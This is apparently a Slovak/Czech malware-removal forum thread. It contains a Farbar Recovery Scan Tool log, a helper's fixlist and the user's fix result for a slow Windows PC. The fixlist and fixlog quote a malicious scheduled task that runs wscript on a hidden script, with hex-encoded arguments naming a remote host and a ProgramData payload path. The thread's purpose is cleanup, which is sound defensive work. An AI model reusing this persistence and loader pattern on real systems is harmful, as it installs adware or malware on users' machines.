ShortcutWithArgument: C:\Users\User\Desktop\Ben - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 3"
ShortcutWithArgument: C:\Users\User\Desktop\justa1 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 1"
ShortcutWithArgument: C:\Users\User\Desktop\máta - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 2"
ShortcutWithArgument: C:\Users\User\Desktop\Profil 1 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Default"

==================== Loaded Modules (Whitelisted) ==============

2018-04-12 00:34 - 2018-04-12 00:34 - 000491744 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2018-04-12 00:34 - 2018-04-12 00:34 - 000472064 _____ () C:\Windows\ShellExperiences\TileControl.dll
2018-04-12 00:34 - 2018-04-12 00:34 - 002759168 _____ () C:\Windows\ShellComponents\TaskFlowUI.dll
2018-10-11 15:25 - 2018-09-20 04:38 - 002185728 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2018-07-11 09:31 - 2018-07-11 09:32 - 001922224 _____ () C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.10314.31700.1000_x64__8wekyb3d8bbwe\Microsoft.Applications.Telemetry.Windows.dll
2018-09-09 20:58 - 2018-09-09 20:59 - 032745472 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1805.2331.0_x64__8wekyb3d8bbwe\PilotshubApp.dll
2018-11-13 21:31 - 2018-11-13 21:37 - 000183808 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.34.81.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe
2018-10-10 13:05 - 2018-10-10 13:05 - 004389888 _____ () C:\Program Files\WindowsApps\Microsoft.OneConnect_5.1809.2571.0_x64__8wekyb3d8bbwe\OneConnect.dll
2018-11-06 14:00 - 2018-11-06 14:01 - 000070144 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsStore_11810.1001.12.0_x64__8wekyb3d8bbwe\WinStoreTasksWrapper.dll
2018-07-01 12:34 - 2018-07-01 12:34 - 003912608 _____ () C:\Windows\SystemApps\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\ContentDeliveryManager.Background.dll
2018-07-01 12:34 - 2018-07-01 12:34 - 002506680 _____ () C:\Windows\SystemApps\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\ContentManagementSDK.dll
2018-10-04 19:44 - 2018-10-04 19:44 - 046459080 _____ () C:\Program Files\Google\Drive\googledrivesync.exe
2018-10-23 16:16 - 2018-10-23 16:18 - 000009216 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.34.81.0_x64__kzf8qxf38zg5c\ImagePipelineNative.dll
2018-11-13 21:31 - 2018-11-13 21:37 - 000060416 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.34.81.0_x64__kzf8qxf38zg5c\ChakraBridge.dll
2018-11-13 22:07 - 2018-11-13 22:07 - 000113664 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\_ctypes.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000080896 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\bz2.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 001792512 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\_hashlib.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000128512 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\win32api.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000137728 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\pywintypes27.dll
2018-11-13 22:07 - 2018-11-13 22:07 - 000548864 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\pythoncom27.dll
2018-11-13 22:07 - 2018-11-13 22:07 - 000689664 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\unicodedata.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000438784 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\win32com.shell.shell.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 001489408 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\wx._core_.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 001007104 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\wx._gdi_.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 001039872 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\wx._windows_.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 001325056 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\wx._controls_.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000916992 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\wx._misc_.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 001084416 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\pysqlite2._sqlite.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000149504 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\win32file.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000136192 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\win32security.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000007680 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\hashobjs_ext.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000020992 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\thumbnails_ext.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000118784 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\usb_ext.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000047616 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\_socket.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 002224640 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\_ssl.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000014848 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\common.time34.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000023040 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\win32event.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000034304 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\windows.conditional.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000020480 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\windows.winwrap.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000110080 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\windows.volumes.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000223232 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\win32gui.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000173568 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\_elementtree.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000169472 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\pyexpat.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000048128 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\win32inet.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000103424 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\wx._html2.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000046080 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\_psutil_windows.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000633272 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\windows._cacheinvalidation.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000011776 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\win32crypt.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000301568 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\PIL._imaging.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000032256 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\_multiprocessing.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 005752320 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\cello.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000026112 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\_yappi.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000044032 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\win32process.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000027648 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\win32pipe.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000010752 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\select.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000029696 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\win32pdh.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000038400 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\windows.connectivity.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000073216 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\windows.device_monitor.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000020480 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\win32profile.pyd
2018-11-13 22:07 - 2018-11-13 22:07 - 000026624 _____ () C:\Users\User\AppData\Local\Temp\_MEI61682\win32ts.pyd
2018-06-17 21:16 - 2018-06-17 21:17 - 067126928 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2018-10-24 14:33 - 2018-10-24 14:33 - 000598232 _____ () C:\Program Files\AVAST Software\Avast\streamback.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2015-07-10 12:04 - 2018-10-16 06:21 - 000000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3294147820-2580206503-2443620995-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\User\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\img0.jpg
DNS Servers: 192.168.178.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

If an entry is included in the fixlist, it will be removed.

HKU\S-1-5-21-3294147820-2580206503-2443620995-1001\...\StartupApproved\Run: => "OneDrive"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{B7C064A5-D3AA-4A61-96BD-0AFF6FA46E2B}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD17\CastingStation.exe
FirewallRules: [{3BA05424-2C2D-4F7A-BA4F-D64D7554BD9E}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD17\Movie\PowerDVDMovie.exe
FirewallRules: [{2923B8DB-5682-4FC6-8BAB-CA11257941EB}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD17\PowerDVD17Agent.exe
FirewallRules: [{F0675FDD-9AB4-449E-AA45-9A4C16DBC1F6}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD17\Kernel\DMS\CLMSServerPDVD17.exe
FirewallRules: [{7EC5855C-8CF6-4DEB-969B-5B7AD0CFF5DB}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD17\PowerDVD.exe
FirewallRules: [{68DF603D-EFF4-46C5-8040-5B18171747EF}] => (Allow) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHost.exe
FirewallRules: [{27BFD4C7-4FD6-425C-AB81-DCBB6669AF44}] => (Allow) C:\Program Files (x86)\Common Files\Mcafee\MMSSHost\MMSSHost.exe
FirewallRules: [{3D7E5A98-D714-40F4-B83E-ED9B0B8AB3A7}] => (Allow) C:\Users\User\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{81148400-9AEB-47BB-B049-47C499681228}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{ED7307B7-6E3A-4824-9E76-D8BA052D7E87}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{D69EA6E7-3F1E-49BD-8712-F11901BE40D2}] => (Allow) C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe
FirewallRules: [{59339258-6CB4-4309-BC05-DEDB1CCF7E79}] => (Allow) C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe
FirewallRules: [{59BDC4E6-A997-45A8-A66F-0774FD5E1008}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

08-10-2018 18:11:44 Windows Update
08-11-2018 15:29:15 Windows Update

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (11/13/2018 08:29:57 PM) (Source: Microsoft-Windows-SpellChecker) (EventID: 33) (User: DESKTOP-A1GGGIV)
Description: httphttp-2147467263

Error: (11/13/2018 08:29:17 PM) (Source: Microsoft-Windows-SpellChecker) (EventID: 33) (User: DESKTOP-A1GGGIV)
Description: httphttp-2147467263

Error: (11/13/2018 08:29:17 PM) (Source: Microsoft-Windows-SpellChecker) (EventID: 33) (User: DESKTOP-A1GGGIV)
Description: httphttp-2147467263

Error: (11/13/2018 03:52:15 PM) (Source: Microsoft-Windows-SpellChecker) (EventID: 33) (User: DESKTOP-A1GGGIV)
Description: httphttp-2147467263

Error: (11/13/2018 02:45:00 PM) (Source: Microsoft-Windows-SpellChecker) (EventID: 33) (User: DESKTOP-A1GGGIV)
Description: httphttp-2147467263

Error: (11/13/2018 02:44:59 PM) (Source: Microsoft-Windows-SpellChecker) (EventID: 33) (User: DESKTOP-A1GGGIV)
Description: httphttp-2147467263

Error: (11/13/2018 02:42:23 PM) (Source: Microsoft-Windows-SpellChecker) (EventID: 33) (User: DESKTOP-A1GGGIV)
Description: httphttp-2147467263

Error: (11/13/2018 02:40:09 PM) (Source: Microsoft-Windows-SpellChecker) (EventID: 33) (User: DESKTOP-A1GGGIV)
Description: httphttp-2147467263


System errors:
=============
Error: (11/13/2018 10:06:22 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Nastavení oprávnění Anwendungsspezifisch neuděluje oprávnění Lokal Aktivierung pro serverovou aplikaci COM s identifikátorem CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
a APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
uživateli NT-AUTORITÄT\Lokaler Dienst (SID: S-1-5-19) z adresy LocalHost (unter Verwendung von LRPC) běžící v kontejneru aplikací Nicht verfügbar – SID (Nicht verfügbar). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.

Error: (11/13/2018 10:05:48 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Služba SAService neuspěla při spuštění v důsledku následující chyby:
Systém nemůže nalézt uvedený soubor.

Error: (11/13/2018 09:38:59 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT-AUTORITÄT)
Description: Instalace se nezdařila: Instalování následující aktualizace se nezdařilo z důvodu chyby (0x80073d02): 9WZDNCRFJ364-MICROSOFT.SKYPEAPP.

Error: (11/13/2018 09:23:18 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Nastavení oprávnění Anwendungsspezifisch neuděluje oprávnění Lokal Aktivierung pro serverovou aplikaci COM s identifikátorem CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
a APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
uživateli NT-AUTORITÄT\Lokaler Dienst (SID: S-1-5-19) z adresy LocalHost (unter Verwendung von LRPC) běžící v kontejneru aplikací Nicht verfügbar – SID (Nicht verfügbar). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.

Error: (11/13/2018 08:28:52 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Nastavení oprávnění Anwendungsspezifisch neuděluje oprávnění Lokal Aktivierung pro serverovou aplikaci COM s identifikátorem CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
a APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
uživateli NT-AUTORITÄT\Lokaler Dienst (SID: S-1-5-19) z adresy LocalHost (unter Verwendung von LRPC) běžící v kontejneru aplikací Nicht verfügbar – SID (Nicht verfügbar). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.

Error: (11/13/2018 07:57:32 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Nastavení oprávnění Anwendungsspezifisch neuděluje oprávnění Lokal Aktivierung pro serverovou aplikaci COM s identifikátorem CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
a APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
uživateli NT-AUTORITÄT\Lokaler Dienst (SID: S-1-5-19) z adresy LocalHost (unter Verwendung von LRPC) běžící v kontejneru aplikací Nicht verfügbar – SID (Nicht verfügbar). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.

Error: (11/13/2018 06:21:32 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Nastavení oprávnění Anwendungsspezifisch neuděluje oprávnění Lokal Aktivierung pro serverovou aplikaci COM s identifikátorem CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
a APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
uživateli NT-AUTORITÄT\Lokaler Dienst (SID: S-1-5-19) z adresy LocalHost (unter Verwendung von LRPC) běžící v kontejneru aplikací Nicht verfügbar – SID (Nicht verfügbar). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.

Error: (11/13/2018 04:50:16 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Nastavení oprávnění Anwendungsspezifisch neuděluje oprávnění Lokal Aktivierung pro serverovou aplikaci COM s identifikátorem CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
a APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
uživateli NT-AUTORITÄT\Lokaler Dienst (SID: S-1-5-19) z adresy LocalHost (unter Verwendung von LRPC) běžící v kontejneru aplikací Nicht verfügbar – SID (Nicht verfügbar). Toto oprávnění zabezpečení lze změnit pomocí nástroje správy Služba komponent.


CodeIntegrity:
===================================

Date: 2018-10-08 14:02:50.158
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\browser_broker.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVAST Software\Avast\ashShA64.dll that did not meet the Microsoft signing level requirements.

Date: 2018-10-08 14:01:23.351
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\browser_broker.exe) attempted to load \Device\HarddiskVolume2\Program Files\Google\Drive\googledrivesync64.dll that did not meet the Microsoft signing level requirements.

Date: 2018-10-08 14:01:23.007
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\browser_broker.exe) attempted to load \Device\HarddiskVolume2\Program Files\Google\Drive\googledrivesync64.dll that did not meet the Microsoft signing level requirements.

Date: 2018-10-08 14:01:22.762
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\browser_broker.exe) attempted to load \Device\HarddiskVolume2\Program Files\Google\Drive\googledrivesync64.dll that did not meet the Microsoft signing level requirements.

Date: 2018-09-24 18:18:14.971
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\browser_broker.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVAST Software\Avast\ashShA64.dll that did not meet the Microsoft signing level requirements.

Date: 2018-09-24 18:18:12.119
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\browser_broker.exe) attempted to load \Device\HarddiskVolume2\Program Files\Google\Drive\googledrivesync64.dll that did not meet the Microsoft signing level requirements.

Date: 2018-09-24 18:18:12.056
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\browser_broker.exe) attempted to load \Device\HarddiskVolume2\Program Files\Google\Drive\googledrivesync64.dll that did not meet the Microsoft signing level requirements.

Date: 2018-09-24 18:18:11.969
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\browser_broker.exe) attempted to load \Device\HarddiskVolume2\Program Files\Google\Drive\googledrivesync64.dll that did not meet the Microsoft signing level requirements.

==================== Memory info ===========================

Processor: AMD A10-5750M APU with Radeon(tm) HD Graphics
Percentage of memory in use: 56%
Total physical RAM: 3287.36 MB
Available physical RAM: 1442.73 MB
Total Virtual: 5719.36 MB
Available Virtual: 3879.2 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:930.32 GB) (Free:636.36 GB) NTFS

\\?\Volume{78df0578-0000-0000-0000-100000000000}\ (System-reserviert) (Fixed) (Total:0.34 GB) (Free:0.08 GB) NTFS
\\?\Volume{78df0578-0000-0000-0000-20aae8000000}\ () (Fixed) (Total:0.85 GB) (Free:0.45 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 78DF0578)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=930.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=874 MB) - (Type=27)

==================== End of Addition.txt ============================

Conder
VIP
VIP
Příspěvky: 4399
Registrován: 30 pro 2013 22:29
Bydliště: Bratislava

Re: Prosim o kontrolu logu. Velice dlouha odezva

#6 Příspěvek od Conder »

:arrow: Otvor poznamkovy blok (Win+R -> notepad -> enter)
  • Skopiruj nasledujuci text a vloz ho do poznamkoveho bloku:

    Kód: Vybrat vše

    Start
    CloseProcesses:
    CreateRestorePoint:
    
    PowerShell: Get-ChildItem -Path "$ENV:USERPROFILE\Desktop" -Recurse -Force | Measure-Object -Property Length -Sum
    Folder: C:\ProgramData\{5139945A-DB7B-1E9C-5DBD-80DEC7FF0B10}
    CMD: type "C:\Users\User\AppData\Roaming\Muledaralo"
    CMD: type "C:\ProgramData\{5139945A-DB7B-1E9C-5DBD-80DEC7FF0B10}\tose.txt"
    
    GroupPolicy: Restriction ? <==== ATTENTION
    FF Homepage: Mozilla\Firefox\Profiles\fv1h6kzk.default -> hxxp://www.bing.com/search?FORM=INCOH1&PC=IC04&PTAG=ICO-5c39e9ad
    FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [No File]
    S2 0322801542040262mcinstcleanup; C:\Users\User\AppData\Local\Temp\032280~1.EXE [999400 2018-06-06] (McAfee, Inc.) <==== ATTENTION
    2018-11-11 23:19 - 2018-07-01 14:58 - 000000000 ____D C:\WINDOWS\System32\Tasks\McAfee
    2018-06-17 20:58 - 2018-06-17 20:58 - 007649280 _____ () C:\Program Files (x86)\GUT4060.tmp
    2017-01-03 20:30 - 2017-01-03 20:30 - 007680000 _____ () C:\Program Files (x86)\GUT62F7.tmp
    Task: {048FD072-7F98-4B21-82C8-BFE8E38E904A} - System32\Tasks\Bing Powered Search nocod => C:\WINDOWS\system32\wscript.exe "C:\ProgramData\{5139945A-DB7B-1E9C-5DBD-80DEC7FF0B10}\tose.txt" "687474703a2f2f79786870612e636f6d" "433a5c50726f6772616d446174615c7b35313339393435412d444237422d314539432d354442442d3830444543374646304231307d5c6669646f7361" "433a5c50726f6772616d446174615c7b35313339393435412d444237422d314539432d354442 (the data entry has 78 more characters). <==== ATTENTION
    Task: {14005E01-FA72-4914-ABDC-954672515EF2} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
    Task: C:\WINDOWS\Tasks\Bing Powered Search nocod.job => Wscript.exe  C:\ProgramData\{5139945A-DB7B-1E9C-5DBD-80DEC7FF0B10}\tose.txt <==== ATTENTIONFirewallRules: [{68DF603D-EFF4-46C5-8040-5B18171747EF}] => (Allow) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHost.exe
    FirewallRules: [{27BFD4C7-4FD6-425C-AB81-DCBB6669AF44}] => (Allow) C:\Program Files (x86)\Common Files\Mcafee\MMSSHost\MMSSHost.exe
    C:\ProgramData\{5139945A-DB7B-1E9C-5DBD-80DEC7FF0B10}
    
    Hosts:
    EmptyTemp:
    End
  • Uloz na plochu s nazvom fixlist.txt
  • Spusti znovu FRST a klikni na Fix
  • Po dokonceni si FRST vyziada restart PC, potvrd kliknutim na OK
  • Po restartovani PC bude na ploche subor Fixlog.txt, jeho obsah sem skopiruj
Absolvent skoly pre novacikov :)
E-mail: conder (zavinac) forum.viry.cz

Ak nieco nie je jasne, pytaj sa. Odporucam mat vzdy zalohovat dolezite data (dokumenty, fotky a ine).

Fixlisty a ine scripty su pisane len pre konkretny PC. Nepouzivajte ich na inych zariadeniach, inak hrozi poskodenie systemu alebo strata dat.
Ak mate podobny problem ako iny uzivatel, prosim, zalozte si vlastnu temu.

V pripade spokojnosti je mozne podporit forum. Dakujeme!

lkcenovsky
Návštěvník
Návštěvník
Příspěvky: 5
Registrován: 11 lis 2018 22:41

Re: Prosim o kontrolu logu. Velice dlouha odezva

#7 Příspěvek od lkcenovsky »

Ahoj,
pozde ale prece pridavam fixlog.
Diky


Fix result of Farbar Recovery Scan Tool (x64) Version: 01.12.2018 01
Ran by User (02-12-2018 17:34:51) Run:2
Running from C:\Users\User\Downloads\FRST-OlderVersion
Loaded Profiles: User (Available Profiles: User)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start
CloseProcesses:
CreateRestorePoint:

PowerShell: Get-ChildItem -Path "$ENV:USERPROFILE\Desktop" -Recurse -Force | Measure-Object -Property Length -Sum
Folder: C:\ProgramData\{5139945A-DB7B-1E9C-5DBD-80DEC7FF0B10}
CMD: type "C:\Users\User\AppData\Roaming\Muledaralo"
CMD: type "C:\ProgramData\{5139945A-DB7B-1E9C-5DBD-80DEC7FF0B10}\tose.txt"

GroupPolicy: Restriction ? <==== ATTENTION
FF Homepage: Mozilla\Firefox\Profiles\fv1h6kzk.default -> hxxp://www.bing.com/search?FORM=INCOH1&PC=IC04 ... O-5c39e9ad
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [No File]
S2 0322801542040262mcinstcleanup; C:\Users\User\AppData\Local\Temp\032280~1.EXE [999400 2018-06-06] (McAfee, Inc.) <==== ATTENTION
2018-11-11 23:19 - 2018-07-01 14:58 - 000000000 ____D C:\WINDOWS\System32\Tasks\McAfee
2018-06-17 20:58 - 2018-06-17 20:58 - 007649280 _____ () C:\Program Files (x86)\GUT4060.tmp
2017-01-03 20:30 - 2017-01-03 20:30 - 007680000 _____ () C:\Program Files (x86)\GUT62F7.tmp
Task: {048FD072-7F98-4B21-82C8-BFE8E38E904A} - System32\Tasks\Bing Powered Search nocod => C:\WINDOWS\system32\wscript.exe "C:\ProgramData\{5139945A-DB7B-1E9C-5DBD-80DEC7FF0B10}\tose.txt" "687474703a2f2f79786870612e636f6d" "433a5c50726f6772616d446174615c7b35313339393435412d444237422d314539432d354442442d3830444543374646304231307d5c6669646f7361" "433a5c50726f6772616d446174615c7b35313339393435412d444237422d314539432d354442 (the data entry has 78 more characters). <==== ATTENTION
Task: {14005E01-FA72-4914-ABDC-954672515EF2} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: C:\WINDOWS\Tasks\Bing Powered Search nocod.job => Wscript.exe C:\ProgramData\{5139945A-DB7B-1E9C-5DBD-80DEC7FF0B10}\tose.txt <==== ATTENTIONFirewallRules: [{68DF603D-EFF4-46C5-8040-5B18171747EF}] => (Allow) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHost.exe
FirewallRules: [{27BFD4C7-4FD6-425C-AB81-DCBB6669AF44}] => (Allow) C:\Program Files (x86)\Common Files\Mcafee\MMSSHost\MMSSHost.exe
C:\ProgramData\{5139945A-DB7B-1E9C-5DBD-80DEC7FF0B10}

Hosts:
EmptyTemp:
End
*****************

Processes closed successfully.
Restore point was successfully created.

========= Get-ChildItem -Path "$ENV:USERPROFILE\Desktop" -Recurse -Force | Measure-Object -Property Length -Sum =========



Count : 15136
Average :
Sum : 144573693739
Maximum :
Minimum :
Property : Length




========= End of Powershell: =========


========================= Folder: C:\ProgramData\{5139945A-DB7B-1E9C-5DBD-80DEC7FF0B10} ========================

not found.

====== End of Folder: ======


========= type "C:\Users\User\AppData\Roaming\Muledaralo" =========


' This program is distributed in the hope that it will be useful,
' but WITHOUT ANY WARRANTY; without even the implied warranty of
' MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
'

' --------------------------------------------------

' Dabebu refen tipuked, Hit, Mip tufuhosa fomeka, Tames raf nasolola nomi kacak nekofo momupase reha depicef
' Cigemade puhamure tusu sagase pihih tero gapema. Dit nafesop cano hedunale taco cuk curo muhora for don calomopa
